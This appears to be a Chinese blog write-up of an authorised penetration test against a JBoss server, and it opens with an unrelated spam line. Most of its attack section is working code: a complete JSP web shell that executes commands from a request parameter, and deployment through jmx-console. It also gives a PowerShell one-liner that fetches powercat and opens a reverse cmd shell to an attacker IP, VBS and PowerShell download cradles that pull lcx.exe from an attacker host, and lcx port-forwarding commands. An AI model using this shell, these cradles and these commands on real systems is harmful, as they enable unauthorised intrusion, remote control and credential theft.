亚洲天堂在线中文字幕,人妻碰碰人妻碰碰

一.前言

最近做滲透測試中遇到一個jboss的站，在其中學(xué)到一些在乙方工作挺有用的技巧（這次測試是進(jìn)過授權(quán)測試）在次分享一下

二.信息收集

先通過namp進(jìn)行掃描，同時(shí)進(jìn)行目錄掃描，發(fā)現(xiàn)8080/jmx-console/，發(fā)現(xiàn)是jboss的站，百度到j(luò)boss可以部署war包getshell,訪問http://xxxx:8080//jmx-console/

三.漏洞利用

全局搜索jboss.system,點(diǎn)擊進(jìn)入

1.制作war包把木馬文件gg.jsp(我是一個直接執(zhí)行命令代碼)用壓縮軟件壓縮為zip,然后更改后綴為war，然后將該war上傳到互聯(lián)網(wǎng)上能夠訪問的網(wǎng)
站上

//gg.jsp <%@ page contentType="text/html;charset=big5" session="false" import="java.io.*" %> <html> <head> <title>title> <meta http-equiv="Content-Type" content="text/html; charset=big5"> head> <body> <% Runtime runtime = Runtime.getRuntime(); Process process =null; String line=null; InputStream is =null; InputStreamReader isr=null; BufferedReader br =null; String ip=request.getParameter("cmd"); try { process =runtime.exec(ip); is = process.getInputStream(); isr=new InputStreamReader(is); br =new BufferedReader(isr); out.println("

"); while( (line = br.readLine()) != null ) { out.println(line); out.flush(); } out.println("

"); is.close(); isr.close(); br.close(); } catch(IOException e ) { out.println(e); runtime.exit(1); } %> body> html> 我這里就用python 簡單創(chuàng)建個ftp服務(wù)(這也是python的一個巧用)

python -m SimpleHTTPServer 8589

2.進(jìn)入jboss.system頁面找到如下，填入遠(yuǎn)程的war文件地址

成功部署的界面如下

3.訪問shell地址,并執(zhí)行命令

四.進(jìn)一步滲透

1.在獲得php shell的基礎(chǔ)上，我們需要一個真正的cmd shell，這樣有利于操作，進(jìn)過nmap掃描，發(fā)現(xiàn)是windows,我們可以通過powershell進(jìn)行shell反彈

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd

本地監(jiān)聽，成功獲取一個cmd shell,接下來就是提權(quán)了

2.在cmd 中查看端口開放信息，3389和445都開放了想到了永恒之藍(lán)打一波,先看看打沒打永恒之藍(lán)的補(bǔ)丁,和看看系統(tǒng)信息，發(fā)現(xiàn)打了很多補(bǔ)丁

可以通過如下鏈接查看補(bǔ)丁編號網(wǎng)址：https://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp 查找永恒之藍(lán)補(bǔ)丁編號進(jìn)行比對發(fā)現(xiàn)該目標(biāo)機(jī)器并沒打補(bǔ)丁

3.看端口掃描結(jié)果，3389過濾了，445也過濾了，只有端口轉(zhuǎn)發(fā)再打了

4.先在shell中查看有那些任務(wù)，看看有沒殺毒軟件，初看沒有，但后來才發(fā)現(xiàn)了，居然有卡巴斯基

5.沒事就到處瀏覽目錄查看內(nèi)容（發(fā)現(xiàn)google賬號密碼居然記錄在txt文件中），發(fā)現(xiàn)任何目錄都能瀏覽和看信息，就懷疑這個用戶的權(quán)限，趕緊看了哈…居然是administrator 組的，那提權(quán)就不用了澀，但還是想3389連進(jìn)去

6.打算用vbs下載一個lcx或者EarthWorm進(jìn)行端口轉(zhuǎn)發(fā),vbs下載代碼，一般下載在C:WindowsTemp目錄下，可讀可寫vbs下載代碼

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>download.vbs echo Set Shell = CreateObject("Wscript.Shell") >>download.vbs echo Post.Open "GET","http://ip/lcxx/lcx.exe",0 >>download.vbs echo Post.Send() >>download.vbs echo Set aGet = CreateObject("ADODB.Stream") >>download.vbs echo aGet.Mode = 3 >>download.vbs echo aGet.Type = 1 >>download.vbs echo aGet.Open() >>download.vbs echo aGet.Write(Post.responseBody) >>download.vbs echo aGet.SaveToFile "C:WindowsTemp2.txt",2 >>download.vbs

powershell 下載代碼

powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:7667/lcxx/lcx.exe','C:WindowsTemp2.txt')7.當(dāng)自己寫進(jìn)去了后，更名為exe執(zhí)行的時(shí)候，被殺了，最后又看了下任務(wù)，才發(fā)現(xiàn)卡巴斯基，然后就一直被卡在這里8.lcx命令如下lcx 命令

//被攻擊機(jī)器 lcx -slave 自己外網(wǎng)ip 51 內(nèi)網(wǎng)ip 3389 //攻擊機(jī)器 lcx.exe -listen 51 9090

由于防火墻限制，部分端口如3389無法通過防火墻，此時(shí)可以將該目標(biāo)主機(jī)的3389端口透傳到防火墻允許的其他端口，如53端口.

lcx -tran 53 目標(biāo)主機(jī)ip 3389

總結(jié)

雖然暫時(shí)沒有成功，但從中還是學(xué)到許多滲透知識，也明白了實(shí)戰(zhàn)能提高許多技術(shù)。不足就是知識不夠，還需努力。

審核編輯：李倩

聲明：本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人，不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用，如有內(nèi)容侵權(quán)或者其他違規(guī)問題，請聯(lián)系本站處理。舉報(bào)投訴